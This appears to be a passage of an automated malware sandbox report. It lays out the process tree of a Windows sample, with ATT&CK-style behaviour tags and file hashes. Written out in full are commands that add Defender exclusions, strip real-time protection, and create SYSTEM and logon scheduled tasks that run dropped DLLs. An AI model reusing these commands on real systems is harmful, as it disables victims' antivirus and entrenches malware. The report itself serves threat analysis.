                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:544
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yryKlDDJVLpCRzjJ" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • Windows security bypass
                                          • System Location Discovery: System Language Discovery
                                          PID:1864
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yryKlDDJVLpCRzjJ" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                          • Windows security bypass
                                          PID:1640
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COkqITLjU" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1304
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\COkqITLjU" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                            PID:2384
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JObHBItpcGleC" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:3036
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JObHBItpcGleC" /t REG_DWORD /d 0 /reg:64
                                            4⤵
                                              PID:1160
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFkYfuKVacUn" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                                PID:1748
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFkYfuKVacUn" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2308
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:1580
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:2868
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fRaJVJSWwewU2" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:2072
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fRaJVJSWwewU2" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2636
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wTVsRuZmkGlUMZVB" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:2608
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\wTVsRuZmkGlUMZVB" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2196
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2780
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                        4⤵
                                                          PID:704
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL" /t REG_DWORD /d 0 /reg:32
                                                          4⤵
                                                            PID:2748
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\nZzDevEyHlFxxDnlL" /t REG_DWORD /d 0 /reg:64
                                                            4⤵
                                                              PID:2720
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yryKlDDJVLpCRzjJ" /t REG_DWORD /d 0 /reg:32
                                                              4⤵
                                                                PID:2728
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\yryKlDDJVLpCRzjJ" /t REG_DWORD /d 0 /reg:64
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2472
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /CREATE /TN "gVvXrLyOM" /SC once /ST 08:19:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                              3⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:2496
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /run /I /tn "gVvXrLyOM"
                                                              3⤵
                                                                PID:1980
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /DELETE /F /TN "gVvXrLyOM"
                                                                3⤵
                                                                  PID:1588
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                  3⤵
                                                                    PID:1796
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                      4⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2492
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                    3⤵
                                                                      PID:2240
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                        4⤵
                                                                          PID:1476
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "yDfhldrwGlWiUkcIx" /SC once /ST 19:28:35 /RU "SYSTEM" /TR "\"C:\Windows\Temp\yryKlDDJVLpCRzjJ\OYoaGPjQGJQPoSV\ahZnqPy.exe\" 8Y /ykCddidFx 385137 /S" /V1 /F
                                                                        3⤵
                                                                        • Drops file in Windows directory
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:2156
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "yDfhldrwGlWiUkcIx"
                                                                        3⤵
                                                                          PID:1108
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 596
                                                                          3⤵
                                                                          • Loads dropped DLL
                                                                          • Program crash
                                                                          PID:3040
                                                                      • C:\Windows\Temp\yryKlDDJVLpCRzjJ\OYoaGPjQGJQPoSV\ahZnqPy.exe
                                                                        C:\Windows\Temp\yryKlDDJVLpCRzjJ\OYoaGPjQGJQPoSV\ahZnqPy.exe 8Y /ykCddidFx 385137 /S
                                                                        2⤵
                                                                        • Checks computer location settings
                                                                        • Executes dropped EXE
                                                                        • Drops Chrome extension
                                                                        • Drops file in System32 directory
                                                                        • Drops file in Program Files directory
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:1912
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2284
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                            4⤵
                                                                            • Indirect Command Execution
                                                                            PID:1308
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1744
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                6⤵
                                                                                  PID:2036
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                              4⤵
                                                                              • Indirect Command Execution
                                                                              PID:956
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                5⤵
                                                                                  PID:1988
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                    6⤵
                                                                                      PID:816
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                  4⤵
                                                                                  • Indirect Command Execution
                                                                                  PID:904
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                    5⤵
                                                                                      PID:1692
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                        6⤵
                                                                                          PID:1992
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                      4⤵
                                                                                      • Indirect Command Execution
                                                                                      PID:1336
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                        5⤵
                                                                                          PID:2364
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                            6⤵
                                                                                              PID:344
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                          4⤵
                                                                                          • Indirect Command Execution
                                                                                          PID:1056
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                            5⤵
                                                                                              PID:2360
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Drops file in System32 directory
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1120
                                                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                  7⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:1964
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /DELETE /F /TN "bcCGPajShxGMlZQUJS"
                                                                                          3⤵
                                                                                            PID:2944
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                            3⤵
                                                                                              PID:1488
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                4⤵
                                                                                                • Indirect Command Execution
                                                                                                PID:1208
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  5⤵
                                                                                                    PID:692
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2384
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        7⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2904
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                  4⤵
                                                                                                  • Indirect Command Execution
                                                                                                  PID:2588
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2072
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2612
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                        7⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2608
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\COkqITLjU\OYTFiB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "fvhMoXYTjforzzT" /V1 /F
                                                                                                3⤵
                                                                                                • Drops file in Windows directory
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:1628
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "fvhMoXYTjforzzT2" /F /xml "C:\Program Files (x86)\COkqITLjU\vGjVsYD.xml" /RU "SYSTEM"
                                                                                                3⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:2248
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /END /TN "fvhMoXYTjforzzT"
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2316
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /DELETE /F /TN "fvhMoXYTjforzzT"
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2312
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "KOUxHKtLWmQusY" /F /xml "C:\Program Files (x86)\fRaJVJSWwewU2\RIaccDa.xml" /RU "SYSTEM"
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:1120
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "pNkouUgxJvHwd2" /F /xml "C:\ProgramData\wTVsRuZmkGlUMZVB\yhVEBLJ.xml" /RU "SYSTEM"
                                                                                                3⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:2168
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "DzewYbfCbqdMiHTlz2" /F /xml "C:\Program Files (x86)\RcpQzLwPHZOgYhlmWbR\lcMYsPx.xml" /RU "SYSTEM"
                                                                                                3⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:3052
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "fpGcAwSIrMdFmUtmmlf2" /F /xml "C:\Program Files (x86)\JObHBItpcGleC\fBzhgTH.xml" /RU "SYSTEM"
                                                                                                3⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:1640
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "NjBIbsaDplWhxmNVa" /SC once /ST 02:26:45 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\yryKlDDJVLpCRzjJ\mmwzQPhm\sdNCLes.dll\",#1 /rndiddTCa 385137" /V1 /F
                                                                                                3⤵
                                                                                                • Drops file in Windows directory
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:928
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /run /I /tn "NjBIbsaDplWhxmNVa"
                                                                                                3⤵
                                                                                                  PID:1688
                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                  schtasks /DELETE /F /TN "yDfhldrwGlWiUkcIx"
                                                                                                  3⤵
                                                                                                    PID:2412
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1912 -s 1548
                                                                                                    3⤵
                                                                                                    • Loads dropped DLL
                                                                                                    • Program crash
                                                                                                    PID:1720
                                                                                                • C:\Windows\system32\rundll32.EXE
                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\yryKlDDJVLpCRzjJ\mmwzQPhm\sdNCLes.dll",#1 /rndiddTCa 385137
                                                                                                  2⤵
                                                                                                    PID:2104
                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\yryKlDDJVLpCRzjJ\mmwzQPhm\sdNCLes.dll",#1 /rndiddTCa 385137
                                                                                                      3⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Loads dropped DLL
                                                                                                      • Drops file in System32 directory
                                                                                                      • Enumerates system info in registry
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:2752
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /DELETE /F /TN "NjBIbsaDplWhxmNVa"
                                                                                                        4⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1260
                                                                                                • C:\Windows\system32\taskeng.exe
                                                                                                  taskeng.exe {6A3E0236-6D5E-4B21-BBF0-9FB7C4922FEA} S-1-5-21-3294248377-1418901787-4083263181-1000:FMEDFXFE\Admin:Interactive:[1]
                                                                                                  1⤵
                                                                                                    PID:2544
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                      2⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1516
                                                                                                      • C:\Windows\system32\gpupdate.exe
                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                        3⤵
                                                                                                          PID:692
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                        2⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:2780
                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                          3⤵
                                                                                                            PID:1224
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                          2⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2348
                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                            3⤵
                                                                                                              PID:2300
                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                          1⤵
                                                                                                            PID:1732
                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                            1⤵
                                                                                                              PID:480
                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                              1⤵
                                                                                                                PID:2816
                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe "-18355536961014746410-1860518497-7230355981911719998-1869762526-941574660-579353410"
                                                                                                                1⤵
                                                                                                                  PID:2360

                                                                                                                Network

                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\Program Files (x86)\COkqITLjU\vGjVsYD.xml

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  e1483962b8b088f4b788647595b5b8e4

                                                                                                                  SHA1

                                                                                                                  325caca548c023d1b9642c99aa9c251768f9c6db

                                                                                                                  SHA256

                                                                                                                  4c848c6992b1d7e698a5659bd9487f63c7ac3e2fa34088fe990f643abe4c50ad

                                                                                                                  SHA512

                                                                                                                  ac9a5e8caa8058cb82344733e6310b9312faf29e36a76134ba563a10d839f528176a847101b53ffb5bcadf0bcfc31cfb82812ffe7d42603ccf9e4ac9c3d8d964

                                                                                                                • C:\Program Files (x86)\JObHBItpcGleC\fBzhgTH.xml

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  af16d51e450d651c5a5b2f8a1bfcc092

                                                                                                                  SHA1

                                                                                                                  2c2e09658ce988734bf39057883928c0cea966a6

                                                                                                                  SHA256

                                                                                                                  712f7399f431a2e2c7690b0e829c0703b5c57f1f188bf1e0f090d499817b247b

                                                                                                                  SHA512

